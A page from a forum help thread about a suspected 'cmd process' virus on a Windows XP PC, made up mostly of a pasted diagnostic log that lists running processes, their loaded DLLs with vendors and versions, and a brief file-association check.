Page 2 of 2

[Help] cmd process virus

Re: cmd process virus

[PID: 2852 / LOCAL SERVICE][C:\WINDOWS\System32\SCardSvr.exe]  [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2113)]
[PID: 2936 / Administrator][C:\WINDOWS\ATK0100\HControl.exe]  [, 1043, 2, 15, 65]
    [C:\WINDOWS\ATK0100\CMSSC.dll]  [N/A, ]
    [C:\WINDOWS\ATK0100\inter_f2.dll]  [ATK, 1043, 2, 15, 52]
    [C:\WINDOWS\ATK0100\ATKWLIOC.DLL]  [ACTIONTEC Electronics,Inc, 2.01.02]
    [C:\WINDOWS\ATK0100\SiSPkt.dll]  [Silicon Integrated Systems Corp., 1, 0, 0, 45]
    [C:\Program Files\Rising\Rfw\ijt_base.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
    [C:\Program Files\Rising\Rfw\olemon.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
    [C:\WINDOWS\system32\APSHook.dll]  [Cognizance Corporation, 2.0.0.015]
    [C:\WINDOWS\system32\msacm32.drv]  [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
    [C:\WINDOWS\system32\SynCOM.dll]  [Synaptics, Inc., 8.3.5 25May06]
[PID: 3060 / Administrator][C:\Program Files\Rising\Rav\RavTask.exe]  [Beijing Rising Information Technology Co., Ltd., 20.0.0.24]
    [C:\Program Files\Rising\Rav\ProcCom.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
    [C:\Program Files\Rising\Rav\RsCommX2.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
    [C:\Program Files\Rising\Rav\RSCOMMON.DLL]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 17]
    [C:\Program Files\Rising\Rav\RSAPPMGR.DLL]  [Beijing Rising Information Technology Co., Ltd., 20.0.0.1]
    [C:\Program Files\Rising\Rav\CfgDll.dll]  [Beijing Rising Information Technology Co., Ltd., 20.0.0.19]
[PID: 3352 / Administrator][C:\Program Files\Synaptics\SynTP\SynTPEnh.exe]  [Synaptics, Inc., 8.3.5 25May06]
    [C:\Program Files\Rising\Rfw\ijt_base.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
    [C:\Program Files\Rising\Rfw\olemon.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
    [C:\WINDOWS\system32\APSHook.dll]  [Cognizance Corporation, 2.0.0.015]
    [C:\WINDOWS\system32\SynCOM.dll]  [Synaptics, Inc., 8.3.5 25May06]
    [C:\WINDOWS\system32\SynTPAPI.dll]  [Synaptics, Inc., 8.3.5 25May06]
    [C:\Program Files\360safe\safemon\safemon.dll]  [360.CN, 4, 2, 0, 1005]
[PID: 3616 / Administrator][C:\WINDOWS\ATK0100\ATKOSD.exe]  [, 1043, 2, 15, 63]
    [C:\Program Files\Rising\Rfw\ijt_base.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
    [C:\Program Files\Rising\Rfw\olemon.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
    [C:\WINDOWS\system32\APSHook.dll]  [Cognizance Corporation, 2.0.0.015]
[PID: 3636 / SYSTEM][C:\WINDOWS\System32\svchost.exe]  [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2111)]
[PID: 3840 / Administrator][C:\Program Files\Wireless Console 2\wcourier.exe]  [, 2, 0, 10, 0]
    [C:\Program Files\Wireless Console 2\MSVCR80.dll]  [Microsoft Corporation, 8.00.50727.762]
    [C:\Program Files\Rising\Rfw\ijt_base.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
    [C:\Program Files\Rising\Rfw\olemon.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
    [C:\WINDOWS\system32\APSHook.dll]  [Cognizance Corporation, 2.0.0.015]
[PID: 3984 / Administrator][C:\WINDOWS\system32\ctfmon.exe]  [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2105)]
    [C:\Program Files\Rising\Rfw\ijt_base.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
    [C:\Program Files\Rising\Rfw\olemon.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
    [C:\WINDOWS\system32\APSHook.dll]  [Cognizance Corporation, 2.0.0.015]
    [C:\Program Files\360safe\safemon\safemon.dll]  [360.CN, 4, 2, 0, 1005]
[PID: 4000 / Administrator][C:\Program Files\DAEMON Tools Lite\daemon.exe]  [DT Soft Ltd, 4.12.2.0]
    [C:\WINDOWS\system32\APSHook.dll]  [Cognizance Corporation, 2.0.0.015]
    [C:\Program Files\DAEMON Tools Lite\DaemonPlugin.dll]  [DT Soft Ltd, 4.12.0.0]
    [C:\Program Files\DAEMON Tools Lite\daemon.dll]  [DT Soft Ltd., 4.12.0.0]
    [C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\SFSShell.dll]  [Cognizance Corporation, 1.22.0.239]
    [C:\WINDOWS\system32\MSVCR70.dll]  [Microsoft Corporation, 7.00.9955.0]
    [C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItMsg.dll]  [Cognizance Corporation, 1.21.0.410]
    [C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\SFSShell.dll]  [Cognizance Corporation, 1.22.0.240]
    [C:\Program Files\DAEMON Tools Lite\Lang\CHS.dll]  [N/A, ]
    [C:\Program Files\DAEMON Tools Lite\Lang\ENU.dll]  [N/A, ]
    [C:\Program Files\DAEMON Tools Lite\Plugins\Images\bw5mount.dll]  [, 1.1.3.0]
    [C:\Program Files\DAEMON Tools Lite\Plugins\Images\bwtmount.dll]  [DT Soft Ltd., 1.01.0.0]
    [C:\Program Files\DAEMON Tools Lite\Plugins\Images\ccdmount.dll]  [DT Soft Ltd., 1.10.0.0]
    [C:\Program Files\DAEMON Tools Lite\Plugins\Images\cuemount.dll]  [DT Soft Ltd., 1.02.0.0]
    [C:\Program Files\DAEMON Tools Lite\Plugins\Images\iszmount.dll]  [DT Soft Ltd., 1.03.0.0]
    [C:\Program Files\DAEMON Tools Lite\Plugins\Images\nrgmount.dll]  [DT Soft Ltd., 1.12.0.0]
    [C:\Program Files\DAEMON Tools Lite\Plugins\Images\pdimount.dll]  [DT Soft Ltd., 1.01.0.0]
    [C:\Program Files\DAEMON Tools Lite\Plugins\Images\pfcmount.dll]  [DT Soft Ltd., 1.00.0.0]
    [C:\Program Files\DAEMON Tools Lite\pfctoc.dll]  [Padus(R), Inc., 1, 0, 0, 12]
[PID: 4020 / Administrator][C:\Program Files\Microsoft ActiveSync\wcescomm.exe]  [Microsoft Corporation, 4.5.5096.0]
    [C:\WINDOWS\system32\CEUTIL.dll]  [Microsoft Corporation, 4.5.5096.0]
    [C:\WINDOWS\system32\RAPI.dll]  [Microsoft Corporation, 4.5.5096.0]
    [C:\Program Files\Microsoft ActiveSync\TCP2UDP.dll]  [Microsoft Corporation, 4.5.5096.0]
    [C:\Program Files\Rising\Rfw\ijt_base.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
    [C:\Program Files\Rising\Rfw\olemon.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
    [C:\Program Files\Microsoft ActiveSync\rapiproxystub.dll]  [Microsoft Corporation, 4.5.5096.0]
    [C:\WINDOWS\system32\APSHook.dll]  [Cognizance Corporation, 2.0.0.015]
    [C:\Program Files\Microsoft ActiveSync\dtptdns.dll]  [Microsoft Corporation, 4.5.5096.0]
[PID: 828 / Administrator][C:\PROGRA~1\MICROS~3\rapimgr.exe]  [Microsoft Corporation, 4.5.5096.0]
    [C:\WINDOWS\system32\CEUTIL.dll]  [Microsoft Corporation, 4.5.5096.0]
    [C:\Program Files\Rising\Rfw\ijt_base.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
    [C:\Program Files\Rising\Rfw\olemon.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
    [C:\WINDOWS\system32\APSHook.dll]  [Cognizance Corporation, 2.0.0.015]
    [C:\Program Files\Microsoft ActiveSync\rapiproxystub.dll]  [Microsoft Corporation, 4.5.5096.0]
[PID: 164 / Administrator][C:\Program Files\Toshiba\Bluetooth Toshiba Stack\TosBtMng.exe]  [TOSHIBA CORPORATION., 5.00.7802.ALL]
    [C:\Program Files\Toshiba\Bluetooth Toshiba Stack\TosCpsAPI.dll]  [TOSHIBA CORPORATION., 3.01.5520.0]
    [C:\Program Files\Toshiba\Bluetooth Toshiba Stack\TosBtMngHelp.dll]  [TOSHIBA CORPORATION., 5.00.6z01.ALL]
    [C:\WINDOWS\system32\TosAvAPI.dll]  [TOSHIBA CORPORATION., 5.00.6804.0]
    [C:\WINDOWS\system32\TosBtSDDB.dll]  [TOSHIBA CORPORATION., 5.00.7515.0]
    [C:\Program Files\Toshiba\Bluetooth Toshiba Stack\TosBtMngLang.dll]  [TOSHIBA CORPORATION., 5.00.6920.0]
    [C:\WINDOWS\system32\TosBdAPI.dll]  [TOSHIBA CORPORATION., 4, 1, 1612, 0]
    [C:\WINDOWS\system32\TosCommAPI.dll]  [N/A, ]
    [C:\WINDOWS\system32\TosLaneAPI.dll]  [TOSHIBA CORPORATION., 1, 0, 3, 0]
    [C:\WINDOWS\system32\TosBtAPI.dll]  [TOSHIBA CORPORATION., 5.00.7615.0]
    [C:\WINDOWS\system32\LCWizard.dll]  [TOSHIBA CORPORATION, 5.0.0.ALL]
    [C:\Program Files\Toshiba\Bluetooth Toshiba Stack\BtUsrMod.dll]  [TOSHIBA CORPORATION, 1, 01, 11, US]
    [C:\WINDOWS\system32\TosHidAPI.dll]  [TOSHIBA CORPORATION., 4, 0, 1108, 0]
    [C:\WINDOWS\system32\TosGnsAPI.dll]  [TOSHIBA CORPORATION., 5, 0, 0, 0]
    [C:\Program Files\Rising\Rfw\ijt_base.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
    [C:\Program Files\Rising\Rfw\olemon.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
    [C:\WINDOWS\system32\TosAcpiAPI.dll]  [TOSHIBA CORPORATION., 1, 0, 3, 0]
    [C:\WINDOWS\system32\APSHook.dll]  [Cognizance Corporation, 2.0.0.015]
    [C:\Program Files\Toshiba\Bluetooth Toshiba Stack\TosBtLoad.dll]  [TOSHIBA CORPORATION, 5, 10, 0, 0]
[PID: 2884 / Administrator][C:\Program Files\Toshiba\Bluetooth Toshiba Stack\TosA2dp.exe]  [TOSHIBA CORPORATION., 5.00.7227.ALL]
    [C:\WINDOWS\system32\TosBtECCAPI.dll]  [TOSHIBA CORPORATION., 3.00.6510.0]
    [C:\WINDOWS\system32\TosBtAPI.dll]  [TOSHIBA CORPORATION., 5.00.7615.0]
    [C:\WINDOWS\system32\TosBdAPI.dll]  [TOSHIBA CORPORATION., 4, 1, 1612, 0]
    [C:\WINDOWS\system32\TosAvdtAPI.dll]  [TOSHIBA CORPORATION., 5.00.7410.0]
    [C:\WINDOWS\system32\TosSndAPI.dll]  [TOSHIBA CORPORATION., 5.00.7117.0]
    [C:\WINDOWS\system32\TosSndPlug.dll]  [TOSHIBA CORPORATION., 5.00.7529.ALL]

Re: cmd process virus

[C:\Program Files\Rising\Rfw\ijt_base.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
    [C:\Program Files\Rising\Rfw\olemon.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
    [C:\WINDOWS\system32\APSHook.dll]  [Cognizance Corporation, 2.0.0.015]
[PID: 2916 / Administrator][C:\Program Files\Toshiba\Bluetooth Toshiba Stack\TosBtHid.exe]  [TOSHIBA CORPORATION., 4, 1, 1323, 0]
    [C:\Program Files\Rising\Rfw\ijt_base.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
    [C:\Program Files\Rising\Rfw\olemon.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
    [C:\WINDOWS\system32\APSHook.dll]  [Cognizance Corporation, 2.0.0.015]
[PID: 3160 / Administrator][C:\Program Files\Toshiba\Bluetooth Toshiba Stack\TosBtHsp.exe]  [TOSHIBA CORPORATION., 5.10.05.70426]
    [C:\WINDOWS\system32\TosBtECCAPI.dll]  [TOSHIBA CORPORATION., 3.00.6510.0]
    [C:\WINDOWS\system32\TosBtAPI.dll]  [TOSHIBA CORPORATION., 5.00.7615.0]
    [C:\WINDOWS\system32\TosBdAPI.dll]  [TOSHIBA CORPORATION., 4, 1, 1612, 0]
    [C:\WINDOWS\system32\LCWizard.dll]  [TOSHIBA CORPORATION, 5.0.0.ALL]
    [C:\WINDOWS\system32\TosSndAPI.dll]  [TOSHIBA CORPORATION., 5.00.7117.0]
    [C:\WINDOWS\system32\TosSndPlug.dll]  [TOSHIBA CORPORATION., 5.00.7529.ALL]
    [C:\Program Files\Rising\Rfw\ijt_base.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
    [C:\Program Files\Rising\Rfw\olemon.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
    [C:\WINDOWS\system32\APSHook.dll]  [Cognizance Corporation, 2.0.0.015]
[PID: 816 / SYSTEM][C:\PROGRAM FILES\RISING\RAV\ravmond.exe]  [Beijing Rising Information Technology Co., Ltd., 20.0.0.80]
    [C:\PROGRAM FILES\RISING\RAV\BWList.dll]  [Beijing Rising Information Technology Co., Ltd., 20.0.0.5]
    [C:\WINDOWS\system32\MFC71.DLL]  [Microsoft Corporation, 7.10.3077.0]
    [C:\WINDOWS\system32\MSVCR71.dll]  [Microsoft Corporation, 7.10.3052.4]
    [C:\WINDOWS\system32\MSVCP71.dll]  [Microsoft Corporation, 7.10.3077.0]
    [C:\PROGRAM FILES\RISING\RAV\RSAPPMGR.dll]  [Beijing Rising Information Technology Co., Ltd., 20.0.0.1]
    [C:\PROGRAM FILES\RISING\RAV\CfgDll.dll]  [Beijing Rising Information Technology Co., Ltd., 20.0.0.19]
    [C:\PROGRAM FILES\RISING\RAV\RsLog.dll]  [Beijing Rising Information Technology Co., Ltd., 20.0.0.36]
    [C:\PROGRAM FILES\RISING\RAV\ProcCom.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
    [C:\PROGRAM FILES\RISING\RAV\RsCommX2.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
    [C:\PROGRAM FILES\RISING\RAV\MonRule.dll]  [Beijing Rising Information Technology Co., Ltd., 20.0.0.29]
    [C:\PROGRAM FILES\RISING\RAV\Hooksys.dll]  [Beijing Rising Information Technology Co., Ltd., 22, 0, 0, 12]
    [C:\PROGRAM FILES\RISING\RAV\HookReg.dll]  [Beijing Rising Information Technology Co., Ltd., 22, 0, 0, 6]
    [C:\PROGRAM FILES\RISING\RAV\HookNtos.dll]  [Beijing Rising Information Technology Co., Ltd., 22, 0, 0, 5]
    [C:\PROGRAM FILES\RISING\RAV\rswalmon.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 24]
    [C:\PROGRAM FILES\RISING\RAV\recomp.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 41]
    [C:\PROGRAM FILES\RISING\RAV\refs.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 18]
    [C:\PROGRAM FILES\RISING\RAV\ffr.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 16]
    [C:\Program Files\Rising\Rav\RsStore.dll]  [Beijing Rising Information Technology Co., Ltd., 20.0.0.9]
    [C:\PROGRAM FILES\RISING\RAV\HookCont.dll]  [Beijing Rising Information Technology Co., Ltd., 22, 0, 0, 3]
    [C:\Program Files\Rising\Rav\fakescan.dll]  [Beijing Rising Information Technology Co., Ltd., 20.0.0.14]
    [C:\Program Files\Rising\Rav\Scanner.dll]  [Beijing Rising Information Technology Co., Ltd., 20.0.0.39]
    [C:\PROGRAM FILES\RISING\RAV\viruslib.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 27]
    [C:\PROGRAM FILES\RISING\RAV\relibldr.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 17]
    [C:\PROGRAM FILES\RISING\RAV\HookWeb.dll]  [Beijing Rising Information Technology Co., Ltd., 20.0.0.3]
    [C:\PROGRAM FILES\RISING\RAV\nvfile.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 7]
    [C:\PROGRAM FILES\RISING\RAV\scanexec.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 22]
    [C:\PROGRAM FILES\RISING\RAV\unexe.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 6]
    [C:\PROGRAM FILES\RISING\RAV\scanex.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 90]
    [C:\PROGRAM FILES\RISING\RAV\pearc.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 8]
    [C:\PROGRAM FILES\RISING\RAV\scanpack.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 10]
    [C:\PROGRAM FILES\RISING\RAV\revm.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 11]
    [C:\PROGRAM FILES\RISING\RAV\urutils.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 7]
    [C:\PROGRAM FILES\RISING\RAV\ur000.dat]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
    [C:\PROGRAM FILES\RISING\RAV\extfile.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 32]
    [C:\PROGRAM FILES\RISING\RAV\scansct.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 11]
    [C:\PROGRAM FILES\RISING\RAV\extole.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 13]
    [C:\PROGRAM FILES\RISING\RAV\posttrt.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 24]
    [C:\PROGRAM FILES\RISING\RAV\scriptci.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 4]
    [C:\PROGRAM FILES\RISING\RAV\ur001.dat]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 4]
    [C:\PROGRAM FILES\RISING\RAV\ur023.dat]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 3]
    [C:\PROGRAM FILES\RISING\RAV\uroutine.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 27]
    [C:\PROGRAM FILES\RISING\RAV\extmail.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 10]
[PID: 3624 / SYSTEM][C:\PROGRAM FILES\RISING\RAV\RavStub.exe]  [Beijing Rising Information Technology Co., Ltd., 20.0.0.10]
    [C:\PROGRAM FILES\RISING\RAV\ProcCom.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
    [C:\PROGRAM FILES\RISING\RAV\RsCommX2.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
    [C:\PROGRAM FILES\RISING\RAV\RSCOMMON.DLL]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 17]
[PID: 496 / Administrator][C:\Program Files\Rising\Rav\RAVMON.EXE]  [Beijing Rising Information Technology Co., Ltd., 20.0.01.27]
    [C:\WINDOWS\system32\MFC71.DLL]  [Microsoft Corporation, 7.10.3077.0]
    [C:\WINDOWS\system32\MSVCR71.dll]  [Microsoft Corporation, 7.10.3052.4]
    [C:\WINDOWS\system32\MSVCP71.dll]  [Microsoft Corporation, 7.10.3077.0]
    [C:\Program Files\Rising\Rav\ProcCom.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
    [C:\Program Files\Rising\Rav\RsCommX2.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
    [C:\Program Files\Rising\Rav\RSCOMMON.DLL]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 17]
    [C:\Program Files\Rising\Rav\recomp.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 41]
    [C:\Program Files\Rising\Rav\refs.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 18]
    [C:\Program Files\Rising\Rav\viruslib.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 27]
    [C:\Program Files\Rising\Rav\relibldr.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 17]
    [C:\Program Files\Rising\Rav\RSAPPMGR.dll]  [Beijing Rising Information Technology Co., Ltd., 20.0.0.1]
    [C:\Program Files\Rising\Rav\CfgDll.dll]  [Beijing Rising Information Technology Co., Ltd., 20.0.0.19]
    [C:\Program Files\Rising\Rav\MonRule.dll]  [Beijing Rising Information Technology Co., Ltd., 20.0.0.29]
    [C:\Program Files\Rising\Rav\PngDll.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 5]
    [C:\Program Files\Rising\Rav\Rsguilib.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 90]
    [C:\Program Files\Rising\Rav\RsXML.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 2]
[PID: 2268 / Administrator][C:\Documents and Settings\Administrator\桌面\Procexp.exe]  [Sysinternals, 10.20]
    [C:\Program Files\Rising\Rfw\ijt_base.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
    [C:\Program Files\Rising\Rfw\olemon.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
    [C:\Program Files\360safe\safemon\safemon.dll]  [360.CN, 4, 2, 0, 1005]
    [C:\WINDOWS\system32\APSHook.dll]  [Cognizance Corporation, 2.0.0.015]
    [C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\SFSShell.dll]  [Cognizance Corporation, 1.22.0.239]
    [C:\WINDOWS\system32\MSVCR70.dll]  [Microsoft Corporation, 7.00.9955.0]
    [C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItMsg.dll]  [Cognizance Corporation, 1.21.0.410]
    [C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\SFSShell.dll]  [Cognizance Corporation, 1.22.0.240]
[PID: 2504 / Administrator][C:\WINDOWS\system32\conime.exe]  [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2105)]
    [C:\Program Files\Rising\Rfw\ijt_base.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
    [C:\Program Files\Rising\Rfw\olemon.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
    [C:\Program Files\360safe\safemon\safemon.dll]  [360.CN, 4, 2, 0, 1005]
    [C:\WINDOWS\system32\APSHook.dll]  [Cognizance Corporation, 2.0.0.015]
[PID: 2816 / Administrator][D:\Program Files\应用\同花顺核新2008\zdsj.exe]  [杭州核新软件技术有限公司, 2008, 7, 1, 0]
    [C:\WINDOWS\system32\Normaliz.dll]  [Microsoft Corporation, 6.0.5441.0 (winmain(wmbla).060628-1735)]
    [C:\WINDOWS\system32\iertutil.dll]  [Microsoft Corporation, 7.00.6000.16705 (vista_gdr.080618-1506)]
    [C:\Program Files\Rising\Rfw\ijt_base.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
    [C:\Program Files\Rising\Rfw\olemon.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
    [D:\Program Files\应用\同花顺核新2008\RICHED20.dll]  [Microsoft Corporation, 5.30.23.1205]
    [C:\Program Files\360safe\safemon\safemon.dll]  [360.CN, 4, 2, 0, 1005]
    [C:\WINDOWS\system32\APSHook.dll]  [Cognizance Corporation, 2.0.0.015]
[PID: 3992 / Administrator][C:\WINDOWS\system32\notepad.exe]  [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2105)]
    [C:\Program Files\Rising\Rfw\ijt_base.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
    [C:\Program Files\Rising\Rfw\olemon.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
    [C:\Program Files\360safe\safemon\safemon.dll]  [360.CN, 4, 2, 0, 1005]
    [C:\WINDOWS\system32\APSHook.dll]  [Cognizance Corporation, 2.0.0.015]
[PID: 3912 / Administrator][C:\Program Files\Rising\Rfw\RfwCfg.exe]  [Beijing Rising Information Technology Co., Ltd., 7.0.2.62]
    [C:\WINDOWS\system32\MFC71.DLL]  [Microsoft Corporation, 7.10.3077.0]
    [C:\WINDOWS\system32\MSVCR71.dll]  [Microsoft Corporation, 7.10.3052.4]
    [C:\WINDOWS\system32\MSVCP71.dll]  [Microsoft Corporation, 7.10.3077.0]
    [C:\Program Files\Rising\Rfw\RsGuiLib.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 90]
    [C:\Program Files\Rising\Rfw\ProcCom.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
    [C:\Program Files\Rising\Rfw\RsCommX2.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
    [C:\Program Files\Rising\Rfw\RSAPPMGR.dll]  [Beijing Rising Information Technology Co., Ltd., 20.0.0.1]
    [C:\Program Files\Rising\Rfw\CfgDll.dll]  [Beijing Rising Information Technology Co., Ltd., 20.0.0.19]
    [C:\Program Files\Rising\Rfw\RSCOMMON.DLL]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 17]
    [C:\Program Files\Rising\Rfw\RfwCtrl.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
    [C:\Program Files\Rising\Rfw\ProxyCtr.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.3]
    [C:\Program Files\Rising\Rfw\RsXML.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 2]
    [C:\Program Files\Rising\Rfw\PngDll.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 5]
    [C:\Program Files\Rising\Rfw\RfwRule.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.17]
[PID: 2272 / Administrator][D:\工具\网络\Maxthon2\Maxthon.exe]  [Maxthon International ltd., 2, 1, 0, 1870]
    [C:\WINDOWS\system32\Normaliz.dll]  [Microsoft Corporation, 6.0.5441.0 (winmain(wmbla).060628-1735)]
    [C:\WINDOWS\system32\iertutil.dll]  [Microsoft Corporation, 7.00.6000.16705 (vista_gdr.080618-1506)]
    [D:\工具\网络\Maxthon2\mxpp.dll]  [Maxthon International ltd., 1, 0, 0, 107]
    [D:\工具\网络\Maxthon2\MxSk.dll]  [Maxthon, 1, 0, 0, 351]
    [D:\工具\网络\Maxthon2\MxProxy2.dll]  [Maxthon International ltd., 1, 0, 0, 4030]
    [D:\工具\网络\Maxthon2\MxExt.dll]  [N/A, ]
    [C:\Program Files\Rising\Rfw\ijt_base.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
    [C:\Program Files\Rising\Rfw\olemon.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
    [C:\Program Files\360safe\safemon\safemon.dll]  [360.CN, 4, 2, 0, 1005]
    [C:\WINDOWS\system32\APSHook.dll]  [Cognizance Corporation, 2.0.0.015]
    [D:\工具\网络\Maxthon2\mxtool.dll]  [, 1, 0, 0, 1]
    [D:\工具\网络\Maxthon2\maxzlib.dll]  [, 1.2.3]
    [D:\工具\网络\Maxthon2\mxfeedU.dll]  [, 1, 0, 45, 92]
    [C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\SFSShell.dll]  [Cognizance Corporation, 1.22.0.239]
    [C:\WINDOWS\system32\MSVCR70.dll]  [Microsoft Corporation, 7.00.9955.0]
    [C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItMsg.dll]  [Cognizance Corporation, 1.21.0.410]
    [C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\SFSShell.dll]  [Cognizance Corporation, 1.22.0.240]
    [D:\工具\网络\Maxthon2\Modules\MxWebBoost\MxWebBoost.dll]  [Maxthon, 1,0,2,1187]
    [D:\工具\网络\Maxthon2\mxdb.dll]  [Max, 3, 5, 3, 125]
    [C:\WINDOWS\system32\ieframe.dll]  [Microsoft Corporation, 7.00.6000.16705 (vista_gdr.080618-1506)]
    [C:\WINDOWS\system32\msacm32.drv]  [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
    [C:\WINDOWS\system32\JDWB20.IME]  [五星工作室, 4.00.950]
    [C:\WINDOWS\system32\GOOGLEPINYIN.IME]  [Google Inc., ]
    [C:\WINDOWS\system32\Macromed\Flash\Flash9f.ocx]  [Adobe Systems, Inc., 9,0,124,0]
[PID: 2712 / Administrator][D:\工具\系统工具\系统诊断工具sreng2\SREngPS.EXE]  [Smallfrogs Studio, 2.5.16.900]
    [C:\WINDOWS\system32\Normaliz.dll]  [Microsoft Corporation, 6.0.5441.0 (winmain(wmbla).060628-1735)]
    [C:\WINDOWS\system32\iertutil.dll]  [Microsoft Corporation, 7.00.6000.16705 (vista_gdr.080618-1506)]
    [C:\Program Files\Rising\Rfw\ijt_base.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
    [C:\Program Files\Rising\Rfw\olemon.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
    [C:\Program Files\360safe\safemon\safemon.dll]  [360.CN, 4, 2, 0, 1005]
    [C:\WINDOWS\system32\APSHook.dll]  [Cognizance Corporation, 2.0.0.015]
    [D:\工具\系统工具\系统诊断工具sreng2\Upload\3rdUpd.DLL]  [Smallfrogs Studio, 2, 1, 0, 15]

Re: cmd process virus

==================================
File associations
.TXT  Error. [C:\WINDOWS\notepad.exe %1]
.EXE  OK. ["%1" %*]
